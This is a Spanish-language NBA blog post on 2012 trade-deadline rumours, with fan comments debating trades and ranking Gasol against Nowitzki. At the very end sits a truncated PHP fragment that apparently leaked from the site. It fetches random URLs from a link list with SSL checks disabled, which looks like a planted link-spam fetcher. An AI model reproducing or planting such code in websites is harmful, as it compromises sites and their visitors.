Rumores antes del día D (capítulo II)

13 de March de 2012 por jose a ramirez

Seguimos con la rumorología que envuelve a la mejor liga de baloncesto del mundo. En este segundo capitulo vamos a recapitular nuevos dimes y diretes y ponernos al día a menos de 72 horas para la fecha limite. ¿Ready?

Comenzamos por el gran nombre propio del mercado. DH12 parece que ha sido ofrecido a Oklahoma a cambio de Ibaka y Harden pero estos, ante las dudas de que no ampliara el jugador su compromiso con ellos mas allá de esta temporada, no han querido arriesgarse a quedarse sin dos piezas clave ahora y con el culo al aire luego. También los Magic lo ofrecieron a Chicago junto a Turkoglu a cambio de Deng, Boozer, Asik y una ronda del draft protegida del 2014. De nuevo las dudas sobre si renovaría han echado para atrás la operación. Hay que decir que tanto Howard como Rose comparten marca publicitaria (Adidas) y habría que ver la presión que esta haría para no tener 2 superestrellas en el mismo mercado.

Del jugador se dice que él va diciendo a todo el mundo que se va. Su entorno deja entrever entre líneas que solo se irá a un mercado grande con una ciudad de temperatura no fría. Demasiados interrogantes y puntos oscuros,  es imposible saber que pasará. Hay que apuntar que a la hora de firmar un nuevo contrato, los Magic son quien más años y dinero puede ofrecer al jugador y que de ser transferido ahora no podría firmar una extensión de contrato con el equipo que lo recibiera hasta el final de la temporada, a causa de la denominada en el último convenio como la Carmelo Rule. Para liar más la cosa, el jugador planea estrategias de marketing con los Magic de cara a la temporada que viene….

Quien tiene las cosas más claras es Josh Smith, que ha pedido formalmente a Atlanta la salida ya que necesita un cambio de aires urgente. Tiene contrato hasta julio de 2013 por lo que la franquicia no tiene por qué tener prisa por desprenderse de él, teniendo más posibilidades y tiempo en el futuro. Todo dependerá de lo que apriete el jugador. ¿Veis accesible un Smith-Hinrich por Pau-Blake?  A mi me cuadra por los salarios, y tampoco se ha hablado mucho del tema y precisamente por eso me da que pensar.

Pobrecito Gasol,  que hasta hace una semana quería seguir a toda costa en Lakers y desde entonces se ha dado cuenta que para seguir en un sitio donde no te quieren, mejor salir. Se había dado por hecho el viernes el acuerdo entre Lakers-Houston mediante el cual los que estos daban por el de Sant Boi a Kevin Martin, Goran Dragic y Luis Scola. Parece que todo fue por un comentario en twitter de un periodista del entorno de los Lakers. Veremos en qué acaba todo.

Quien puede salir es Andrew Bogut. Milwaukee está abierto a escuchar ofertas por él,  aunque claro, con truco: siempre y cuando le acompañe Stephen Jackson. Aun así, parece que Washington y Warriors han preguntado por el pívot australiano. Precisamente, los Wizards han puesto en el escaparate a toda su plantilla excepto Wall, y son Blatche y McGee, por este orden, los que tienen más papeletas para salir.

Teníamos curiosidad por ver en qué derroteros se movería Boston. Larry Bird ha desvelado que Ainge le ofreció a Indiana a Ray Allen a cambio de “Psico-T” Hansbrough y una primera ronda del próximo draft. ¿Vale Sugar Ray eso? El “pájaro” dijo que no. Si esa es la manera de Ainge de mejorar el equipo, puede que Don Larry le haya hecho el último favor a sus ex.

¡Ojo con esto! Parece ser que los Lakers insisten con Rajon Rondo y desde Massachusetts se filtra que en las conversaciones que han mantenido esta semana NO entra Gasol en el supuesto traspaso porque L.A. no quiere desprenderse de él. ¿A qué juegan?

De Memphis y New York no hablamos en el primer capítulo. Los Grizzlies rechazaron una oferta de Miami que consistía en James Jones por Sam Young y Haddadi. Os refresco que O.J. Mayo ha sonado para salir desde el principio de pre-temporada. Mientras, en la gran manzana no renuncian a la posibilidad de desprenderse de Stoudemire. De nuevo Howard entraría en escena. Por cierto, cada vez son más los críticos en la prensa neoyorquina en torno a la figura de Carmelo Anthony, basándose en los malos resultados del equipo desde que llegó el año pasado y en este desde que volvió de la lesión ¿Casualidad?

En Portland hay negociaciones serias entre Bobcats por un lado y Clippers por otro por Jamal Crawford. Vayamos por partes. Los de Carolina del Norte ofrecen a D.J. Augustin pero al jugador de los Blazers no le interesa para nada marcharse a Charlotte. Lo que está al caer es la opción Clippers. Estos ofrecen a Eric Bledsoe y Ryan Gomes. Podría ser el primer traspaso del mercado. Quien puede acompañarle en la salida es McMillan. Paul Allen le tiene en el punto de mira y Jordan mira ese reloj para cuando suene la alarma llevárselo a Bobcats y deshacerse de Paul Silas.

Para ir cerrando, unas pinceladas varias.

Ramon Sessions no piensa en salir de Cleveland y los Cavaliers aseguran por ahí que se van a intentar mover activamente estos días.

New Orleans pone en el mercado además de a Chris Kaman a Emeka Okafor.

Minnesota, después de la grave lesión de Ricky Rubio, segurísimo que cierra algo, máxime cuando ya antes buscaban escolta.

A “The Birdman” Andersen también le han puesto el cartel de transferible en Denver, lo mismo que al gran Anthony Carter en Toronto, donde por cierto nadie quiere ir.

Y para finalizar, una noticia que hará feliz a muchísima gente: por lo visto, Brandon Roy está pensando seriamente la posibilidad de volver las canchas la próxima temporada, aunque eso será ya harina de otro costal.

De momento, el balón sigue rodando, nosotros lo disfrutamos y los rumores siguen en una calma tensa hasta que se desencadene la tormenta el miércoles-jueves. ¿O NO?.

Seguiremos informando ya con los traspasos que se vayan produciendo al cierre del mercado.

Esto parece un efecto dominó, en el que todas las piezas se derrumbarán unas detrás de otra en cuanto caiga la primera. Saludos y ¡que empiece la locura!

Comenta

123 comentarios a esta entrada

  1. Leon Van Bon dice:
    #1

    Bajo mi punto de vista es un trade mucho mas desfavorable para GSW. Entiendo la situación de GSW, que necesitan pintura y apostar definitivamente por Curry.

    Pero es que se quedan con dos tios de cristal. Tiran esta temporada desde ya y la la que viene van a estar poniendo velitas todo el año para que no se rompa Bogut.

    Y de acuerdo a que Eliis no es un tio para montar nada alrededor suyo, sino un buen complemente para otro equipo (como creo que lo ven los Bucks), pero ¿quién va a anotar los 20-25 puntos que metía Monta en GSW?
    ¿Y si Curry esta fuera? Action Jackson volverá por sus fueros? son muchos dedos cruzados.

    No se, creo que Ellis está mal vendido, podían haber sacado piezas mas firmes por él, y no estar jugando a la ruleta rusa durante mucho tiempo, que por desgracias creo que va a pasar en GSW los próximos meses.

      Citar

  2. Ru dice:
    #2

    La gran cagada para mí es no haberse librado del contrato de Biedrins,ahora lo amnistían la próxima campaña o se comen 18 millones más de la rémora esa.Los Warriors son un equipo perdedor desde hace muchas temporadas y necesitaban un cambio,han arriesgado y teniendo en cuenta el estado de la franquicia han de correr ese riesgo,pero dejan el futuro del equipo en manos de dos jugadores de cristal de bohemia,mírame pero no me toques,además que serán muy dependientes de ellos.Su ronda es protegida TOP 7…yo me dejaba llevar esta campaña para pillar cacho,total la campaña está perdida.

    Por Milwaukee no veo a Jennings y Monta juntos,puede perjudicar bastante a Jennings,si bien haciendo caso a los números dan dos jugadores no utilizados por un anotador compulsivo y un SF con cierto futuro,así que desde ese punto de vista empujoncito para ellos en sus aspiraciones de meterse en PO.

      Citar

  3. Ekos dice:
    #3

    El trade me ha pillado por sorpresa. Creo que los Bucks salen ganando de calle, ganan a un gran anotador como Ellis, a un jugador que si se pone es muy bueno como Udoh y a alguien -pese a su contrato- que puede ser parte de la rotación.

    Por parte de los Warriors, confían sus posibilidades a dos jugadores propensos a lesionarse, a un futuro lottery pick y a una resurrección de Jackson. ¿Cómo les saldrá? Veremos. Sí, han mejorado la zona, pero han arriesgado mucho.

    Dos equipos divertidos de ver, de eso no cabe duda.

      Citar

  4. MagicJohnson32 dice:
    #4

    Lo que parece claro es que los Warriors van de cabeza a asegurar su pick del draft de 2012, que lo tienen restringido a un Top 7. Si saliese más bajo sería para los Jazz.

      Citar

  5. Basket000 dice:
    #5

    Ekos…¿que dices? ese traspaso es una estafa pa los LAL…Gasol es el mejor alapivot de la nba y pierden a un base bueno como blake. Y que ganan? Un Anderson que solo hace algo cuando quiere,un contratazo como el de Turkoglu y a nelson que ya no vale pa nada…E-S-T-A-F-A

    Sobre el trade,los Warriors el ganador claro

      Citar

  6. Uno cualquiera dice:
    #6

    Yo me quedo con que el único trade realizado hasta ahora es uno del cual no había escuchado ni un solo rumor antes de que se produjera.

      Citar

  7. melo15 dice:
    #7

    Gasol, no es ni Top-3 en ala-pivots, y rozando el Top-5

      Citar

  8. Ekos dice:
    #8

    Dwight ha dicho en la ESPN que quiere acabar el año en los Magic.

      Citar

  9. MagicJohnson32 dice:
    #9

    Uno cualquiera:
    Yo me quedo con que el único trade realizado hasta ahora es uno del cual no había escuchado ni un solo rumor antes de que se produjera.

    No es del todo cierto. El lunes por la noche comenté en el anterior post de rumores (http://blog.tjnba.com/2012/03/10/rumores-antes-del-dia-d/) que los Warriors iban tras Bogut. No es nada sorprendente, la verdad. Monta Ellis quería irse y Mark Jackson quería un pívot. Lo intentaron con Dwight pero ni el jugador ni los Magic estaban dispuestos, así que se fueron a por Kaman y Bogut, y se han hecho con el australiano. El gran error por parte de los GSW es, en mi opinión, quedarse con el contrato de Stephen Jackson, de quien ya dicen que lo están ofreciendo para traspasarlo. Lo de traspasar a Monta Ellis tiene todo el sentido del mundo teniendo en cuenta que la franquicia apuesta claramente por Curry, y Bogut es un gran pívot que, en otras condiciones, resultaría mucho más caro.

      Citar

  10. MagicJohnson32 dice:
    #10

    Ekos:
    Dwight ha dicho en la ESPN que quiere acabar el año en los Magic.

    Claro. E irse en verano a los Nets sin que estos tengan que dar nada a cambio. En serio, si los Magic no lo traspasan es que son muy idiotas.

      Citar

  11. Ekos dice:
    #11

    Eso mismo pensé yo jajaja! Yo, si soy Otis Smith le busco un traspaso, aunque no sea mucho lo que me dén, algo es mejor que nada. O eso o traigo una estrella. Lo tienen fastidiado los Magic.

      Citar

  12. Denise dice:
    #12

    Perfecto si Howard está hasta final de temporada. Sería la mejor noticia para los Magic.
    Que renueva, pues perfecto; que no renueva pues chungo, pero al menos reconstruyes desde cero y con una masa salarial baja. Prefiero eso a malvenderlo por un Bynum, por Brook Lopez + morralla de Nets o por Haywood y Odom.
    Si se va, pues se respeta su decisión obviamente, pero al menos te vas con la dignidad y la satisfacción de no haberlo malvendido ni haberselo regalado a otro, poniendole el anillo en bandeja.

      Citar

  13. Ekos dice:
    #13

    Lo de malvenderlo por Bynum estuve charlándolo hoy mismo con un amigo, él decía: ‘Jaja! Ni de coña, los Magic no son tontos. ¿El mejor por un buen pívot? Nah’ – textualmente. Yo le dije que es mejor conseguir algo que nada, ¿Qué creéis?

      Citar

  14. MagicJohnson32 dice:
    #14

    Denise:
    Perfecto si Howard está hasta final de temporada. Sería la mejor noticia para los Magic.
    Que renueva, pues perfecto; que no renueva pues chungo, pero al menos reconstruyes desde cero y con una masa salarial baja. Prefiero eso a malvenderlo por un Bynum, por Brook Lopez + morralla de Nets o por Haywood y Odom.
    Si se va, pues se respeta su decisión obviamente, pero al menos te vas con la dignidad y la satisfacción de no haberlo malvendido ni haberselo regalado a otro, poniendole el anillo en bandeja.

    ¿No aprendisteis nada del verano del 96?

      Citar

  15. Denise dice:
    #15

    Mike D’Antoni cesado como coach de los Knicks

      Citar

  16. MagicJohnson32 dice:
    #16

    Dice Wojnarowski que se ha intensificado la negociación entre Wolves, Blazers y Lakers por la cual Crawford iría a los Wolves y Beasley a los Lakers. No sé qué daría LAL.

      Citar

  17. MagicJohnson32 dice:
    #17

    Pues en un giro inesperado, se rumorea que Dwight dice estar dispuesto a seguir hasta la próxima temporada en los Magic. La franquicia quiere el compromiso por escrito (es decir, que ejecute la opción para 2012-2013). Puede que Howard simplemente esté toreando a los Magic, no sé…

      Citar

  18. Cocinitas dice:
    #18

    MagicJohnson32:
    Dice Wojnarowski que se ha intensificado la negociación entre Wolves, Blazers y Lakers por la cual Crawford iría a los Wolves y Beasley a los Lakers. No sé qué daría LAL.

    Pues por lo que he leido quien entraria en el traspaso es Blake y supongo que parte de la trade exception de Odom para cuadrar lo salarios. Buen cambio a priori para Lakers y Wolves. Saldrá Felton tambien en direccion LA?? Si así fuera ojito con los Lakers. Que un banquillo con Felton, Beasley, Murphy, Macroberts, Barnes y Goudelock suena muy bien.

      Citar

  19. MagicJohnson32 dice:
    #19

    Creo que los Lakers acabarán haciéndose con Felton o Sessions, dependiendo de quién les salga más rentable. Y hombre, ya sea Felton o Sessions, llegaría para ser titular.

      Citar

  20. Sancho88 dice:
    #20

    melo15:
    Gasol, no es ni Top-3 en ala-pivots, y rozando el Top-5

    Melo, Gasol es el segundo mejor ala pivot de la liga, solo por detrás de Kevin Love. Garnett y Duncan, han sido mejores que él, pero ahora están mayores. Y si no es ni top 5, dime mejores ala pívots…

      Citar

  21. melo15 dice:
    #21

    Bueno Sancho, Dirk muchisimo mejor, Webber, Bosh esta a su nivel, Josh Smith, Aldridge igual, Griffin, David Lee es peor, pero lo esta haciendo mejor que Gasol.
    En verdad Gasol es Top-3, pero no lo esta demostrando, no esta cumpliendo con su rol de segunda espada, porque Bynum esta mejor que el

      Citar

  22. MagicJohnson32 dice:
    #22

    Sancho88: Melo, Gasol es el segundo mejor ala pivot de la liga, solo por detrás de Kevin Love. Garnett y Duncan, han sido mejores que él, pero ahora están mayores. Y si no es ni top 5, dime mejores ala pívots…

    Con gente como Dirk, LaMarcus y Griffin, cabe la discusión sobre quiénes son los mejores PF. Yo diría que Love y Dirk están por encima de Pau sí o sí.

      Citar

  23. Sancho88 dice:
    #23

    Bueno, Dirk evidentemente que sí, me lo había saltado porque su temporada está siendo inferior a las anteriores, pero el resto de los que decís, primero que demuestren algo. Pau tiene dos anillos, jerarquía dentro de la liga, un campeonato del mundo siendo el mejor jugador nombrado por la FIBA… yo digo que Griffin igual es mejor, y Aldridge más joven y con mucho potencial. Pero lo que también digo es que lo demuestren, que Pau ya tiene dos anillos, nadie le ha regalado nada, y no son todo estadísticas. El liderazgo de Pau es innegable. No sé si fue hace dos años o hace tres, pero fue clave tanto en la eliminatoria durísima contra los Rockets, luego contra Denver y luego contra los Magic. CLAVE, CLAVE, CLAVE, dando recitales en defensa y en ataque, y con aquel tick nervioso con el giro de cabeza hacia un lado que le indicaba a Bryant aquella jugada, os acordáis? Y luego, en la final contra los Celtics de hace dos años, también es innegable que le dieron el MVP a Bryant porque mediáticamente se lo tenían que dar, pero se lo merecía también Pau. A mí no me acompleja ni Aldridge, ni Griffin, y a Dirk también le ha ganado la partida muchas veces en duelos directos, aunque el año pasado, que es el precedente más cercano, fue al revés. Ya digo, Pau y Dirk son parecidos, con más talento Dirk, pero más completo Pau. Indiscutiblemente, Love es el mejor, y del resto, que demuestren lo que tienen en Playoffs. Si no, a mí personalmente no me valen en la comparación con Pau

      Citar

  24. simon dice:
    #24

    Pufff si empezamos un debate sobre ala pivots mejores que Pau y empezamso metiendo a Josh Smith y a Griffin mal vamos…

      Citar

  25. Vader dice:
    #25

    simon:
    Pufff si empezamos un debate sobre ala pivots mejores que Pau y empezamso metiendo a Josh Smith y a Griffin mal vamos…

    /agree

    Como mucho pongo a Dirk por delante. LaMarcus esta cerca pero aún tiene que demostrar más. Gasol es una regularidad y unos intangibles tremendos. Si no fue un buen jugador franquicia en Menphis fue por su cáracter demasiado generoso en pista. Si el quisiera y forzará un poco haría 22 puntos y sus 10 rebotes de media. Y claro, en Menphis tenía una castaña de equipo, nada que ver con lo que tienen ahora. Jugaban de titulares habituales Earl Watson, el fallecido L.Wright, James Posey y Gasol consiguio meterlos en playoff. Hacer más era imposible para cualquier jugador.

      Citar

  26. MagicJohnson32 dice:
    #26

    Ojo que parece que Crawford no está con los Blazers. Vamos a ver si Blake está con los Lakers porque puede haber trade.

      Citar

  27. Sancho88 dice:
    #27

    Bueno, de momento solo llevan un cuarto, y es verdad que el pavo no ha jugado, pero todavía no ha habido cambio para Felton. Podríamos asegurar algo más si no aparece en la primera parte, por ejemplo…

      Citar

  28. MagicJohnson32 dice:
    #28

    Sancho88:
    Bueno, de momento solo llevan un cuarto, y es verdad que el pavo no ha jugado, pero todavía no ha habido cambio para Felton. Podríamos asegurar algo más si no aparece en la primera parte, por ejemplo…

    ¿Que haya salido ya Nolan Smith y Crawford no te sirve como prueba concluyente? xD

    Ale, voy a ver a los Lakers.

      Citar

  29. Sancho88 dice:
    #29

    Ok, Nolan Smith en la cancha. Lo de Crawford está cantado. Ahora a ver si juega DJ Augustin, Blake, etc.

      Citar

  30. MagicJohnson32 dice:
    #30

    Blake en pista por los Lakers. DJ Augustin también por los Bobcats. Mmm…

      Citar

  31. Cocinitas dice:
    #31

    Cuidado que ahora Howard dice que no quiere firmar el año por escrito. Los Magic se han calentado y estan negociando con Houston por el pivot.

      Citar

  32. Cocinitas dice:
    #32

    Ah y por cierto los Grizzlies estan sondeando la posibilidad de incorporar a Gilbert Arenas. Sinceramente creo que son los tapados de la liga, todo el mundo habla de Thunder, Bulls y Heat, pero cuidado con Memphis que el año pasado forzaron el 7º partido con los Thunder y sin Rudy Gay. Este año para mi tienen incluso mejor equipo, más aún con Arenas para anotar desde el banquillo. Con Conley, Allen, Gay, Randolph y Marc y un banco con Arenas, Mayo, Pondexter, Speights y Cunningham son capaces de ganar a cualquiera.

      Citar

  33. Sancho88 dice:
    #33

    Cocinitas:
    Ah y por cierto los Grizzlies estan sondeando la posibilidad de incorporar a Gilbert Arenas. Sinceramente creo que son los tapados de la liga, todo el mundo habla de Thunder, Bulls y Heat, pero cuidado con Memphis que el año pasado forzaron el 7º partido con los Thunder y sin Rudy Gay. Este año para mi tienen incluso mejor equipo, más aún con Arenas para anotar desde el banquillo. Con Conley, Allen, Gay, Randolph y Marc y un banco con Arenas, Mayo, Pondexter, Speights y Cunningham son capaces de ganar a cualquiera.

    Creo que te equivocas al ponerlos como candidatos al título. Ni de coña hermano

      Citar

  34. cocinitas dice:
    #34

    Sancho88: Creo que te equivocas al ponerlos como candidatos al título. Ni de coña hermano

    De verdad no te parece un equipo que le puede hacer mucho daño a los Heat con esa pareja interior Marc- Randolph. Además de defensivamente con los emparejamientos Lebron-Gay y Wade-Allen. Además tienen mucha mayor profundidad de banquillo. Para mi los maximos rivales de Heat son ellos.

      Citar

  35. MagicJohnson32 dice:
    #35

    Se comenta que está cerrado: Blake a Portland, Beasley a Lakers y Crawford a Minny. Tiene sentido para los tres. Ahora a ver dónde acaba Felton.

      Citar

  36. Sancho88 dice:
    #36

    Entonces a los Lakers les falta un base, si no me fallan las cuentas… Será Felton? Lo que pasa es que ahora mismo, MWP está jugando bien, como suplente valdría. Felton por Barnes, a lo mejor? Porque Beasley-MWP-Barnes es demasiado, y no creo que los Blazers vayan a aceptar un MWP por Felton…

      Citar

  37. RSB dice:
    #37

    ¿Soy el único al que le parece una salvajada lo de Blake y Portland? El amigo Steve me parece uno de los 5 bases más mediocres de toda la liga (una liga donde están saliendo bases aprovechables como churros) al que le quedan encima tres años de 4 kilitos, cuando cada año va a menos.

    Dar a un Crawford o a cualquier cosa por Blake me parece de locos. Y pensar que ese tío es un base fiable como director para 20-25 minutos, más de locos todavía.

    Coincido en el potencial de Memphis, los grandes tapados del oeste que pueden dar un sorpresón si Randolph vuelve por sus fueros. Lo que nunca entendí es por qué dieron a Vasquez por Pondexter, un cambio absurdo. El primero me parece que tiene bastante más techo y lo está haciendo bien en NO, ahora andan buscando base… Tela. Y todo para cubrir una posición que apenas dispone de minutos, cuando el buen hombre de Young cumplió bien el año pasado.

      Citar

  38. nba dice:
    #38

    Menudo pufo esta hecho Boozer…, parece otro cazacontratos y a la bartola

      Citar

  39. melo15 dice:
    #39

    Bueno, Pau es Top-5, pero jugadores como Aldridge, rendirian mucho mejor de segunda espada, como hizo Pau en Lakers, aunque tienes razon que jugadores como Griffin, tienen que demostrar ahora que son estrellas, porque ahora con Paul no hay excusas. No me compares a a Dirk con Pau Sancho, porque el aleman al contario de Pau ha sabido ser un jugador franquicia, y tanto sus numeros como sus logros son iguales o mejores.
    Sobre Mephis, no son contenders, aunque creo que pueden llegar a finales de conferencia

      Citar

  40. Sancho88 dice:
    #40

    melo15:
    Bueno, Pau es Top-5, pero jugadores como Aldridge, rendirian mucho mejor de segunda espada, como hizo Pau en Lakers, aunque tienes razon que jugadores como Griffin, tienen que demostrar ahora que son estrellas, porque ahora con Paul no hay excusas. No me compares a a Dirk con Pau Sancho, porque el aleman al contario de Pau ha sabido ser un jugador franquicia, y tanto sus numeros como sus logros son iguales o mejores.
    Sobre Mephis, no son contenders, aunque creo que pueden llegar a finales de conferencia

    Sí hijo sí, si te comparo a Nowitzki con Pau. Que se han defendido uno al otro mil veces, y la cosa esta fifty fifty. Y en lo de los logros…sí, Nowitzki tiene un MPV, que eso jamás lo tendrá Pau (porque estaba Bryant, porque repito que en los playoffs de hace dos años rindió por encima de él, a mi juicio), pero Pau tiene dos pedrolos, por uno del alemán, tiene la copita Naysmith (es decir, el MUNDOBASKET, siendo´mejor jugador del torneo), además de un mundial junior, dos EUROBASKET… donde también competía Nowitzki, y muchas veces fue nombrado mejor jugador Pau antes que Dirk. Para nada me parece descabellada la comparación, aunque te repito, sale ganando Dirk en lo individual, pero en conocimiento de juego colectivo, y también en inteligencia, gana Pau. A Pau solo le recuerdo un truño en toda su carrera: la mandarina que se tiró en el eurobasket de madrid 2007 en la final contra rusia, que además jugó andando todo el torneo, como de sobrado, algo que jamás le había yo visto a Pau. Y Nowitzki muchas veces abusa de su tiro, por decirlo suavemente, es un poco chupón. Mira, te pongo esta noche por ejemplo. Perdían los Lakers de 3-5 faltando un minuto, la situación era jodida de cojones. Bryant se la da a Pau, Pau se ve encima a Kaman, a los 7 metros reglamentarios donde juega esta temporada, y qué hace? Tira a lo Nowitzki a ver si se convierte en el salvador de la humanidad? Pues no, es consciente de que Bryant es mejor jugador que él, y en vez de tirarse una castaña pilonga, se la da a Bryant, que se va a los 7,25, se santigua, mira a los árbitros, tira su pepino reglamentario, hace el paripé y… tres tiros libres por falta personal de Gustavo Ayón. Ves lo que te digo de que es un tipo inteligente? Dime tú si le iban a pitar esos tres tiros libres a Pau, y, sobre todo, si los iba a meter. Pues no, pero sabe que Bryant si lo puede hacer, y por eso le da la bola. Vale, que Nowitzki ha metido muchos clutchs, pero esa lectura en una milésima de Pau, es solo de un tipo superdotado mentalmente para jugar a este deporte. Y así, mil casos. No solo en ataque, también en defensa. Cuantos partidos han ganado Lakes porque Pau ha sabido poner el tapón en los últimos momentos? Eso también gana partidos. En definitiva, lo que tú mismo dices muchas veces, Pau no es un 20-10 porque no quiere, no porque no pueda. Y por qué no quiere? Porque prefiere hacer a sus compañeros de equipo mejores, y que se impliquen más y rindan más. Ahora bien, que lo que hace Dirk con Alemania también tiene su mérito, no te creas. Que les metió en semifinales del mundial de Indianápolis y se llevaron el bronce, y luego llegaron en Serbia a la final contra Grecia… aunque al final la perdiesen, y eso tiene mucho mérito. Y el mérito es casi exclusivo de este tipo. Siendo objetivos, ambos han tenido carreras muy brillantes en todos los aspectos, aunque Nowitzki es algo mejor que Pau, pero vamos, de ahí a decir que son incomparables… como si fuera un sacrilegio comparar a PAU GASOL con DIRK NOWITZKI, cuando probablemente sean, junto a Sabonis, los tres mejores jugadores altos de la historia del baloncesto europeo…

      Citar

  41. melo15 dice:
    #41

    Ya pero Dirk ha sabido ser un jugador frnaquicia y Pau no, aunque Pau es super bueno quizas me he pasado con la comparacion. Avece hay que ser un poco egoista Sancho.

      Citar

  42. nba dice:
    #42

    wooow, es bueno que comparen a Pau con Dirk , eso significa que el catalán a hecho cosas buenas , con tanto runrun de traspaso , a ver si al final vamos a escuchar , esta frase lejana …
    “And the Atlanta Hawks selects …”

      Citar

  43. MagicJohnson32 dice:
    #43

    Sancho88:
    Entonces a los Lakers les falta un base, si no me fallan las cuentas… Será Felton? Lo que pasa es que ahora mismo, MWP está jugando bien, como suplente valdría. Felton por Barnes, a lo mejor? Porque Beasley-MWP-Barnes es demasiado, y no creo que los Blazers vayan a aceptar un MWP por Felton…

    Hay otra versión posible del trade, en la que los Lakers reciben a Beasley y dan una 1ª ronda y la parte de la Trade Exception de Odom correspondiente al salario de Beasley. Los Wolves reciben la TE y a Crawford, y los Blazers reciben a Ridnour y la 1ª ronda. Eso deja a Blake en los Lakers, con la posibilidad de traspasarlo por Felton o, quién sabe, dejar las cosas en el puesto de base como están.

      Citar

  44. Txusma dice:
    #44

    Barbosa a los Pacers a cambio de una 2ª ronda y Sam Young a los Sixes a cambio de absolutamente nada, los derechos de un jugador escogido en 2005 que nunca llegó a debutar

      Citar

  45. max dice:
    #45

    Si, parece que los Grizzlies están haciendo espacio para la posible llegada de Arenas. Young hizo una gran temporada el año pasado pero en este casi no entraba en la rotación. De todas maneras, si no es para que llegue alguien no tiene sentido el movimiento.

      Citar

  46. MagicJohnson32 dice:
    #46

    Woj dice que los Nets negocian con los Blazers para hacerse con Gerald Wallace.

      Citar

  47. MagicJohnson32 dice:
    #47

    Y Broussard asegura que Howard le ha mandado un SMS para decirle que ha firmado y por tanto renunciar a la opción de convertirse en FA este verano. Es decir: salvo que lo traspasen, Dwight Howard jugará en los Magic hasta el verano de 2013.

      Citar

  48. MagicJohnson32 dice:
    #48

    Con lo cual… ¿deberían los Nets traspasar a Deron ya? En realidad no es una pregunta, los Nets deberían traspasar a Deron inmediatamente, porque este verano se larga seguro.

      Citar

  49. nba dice:
    #49

    Esto se anima !!!

      Citar

  50. melo15 dice:
    #50

    Grande HOWARD! Esto es lo que han de hacer los verdaderos jugadores franquicias

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>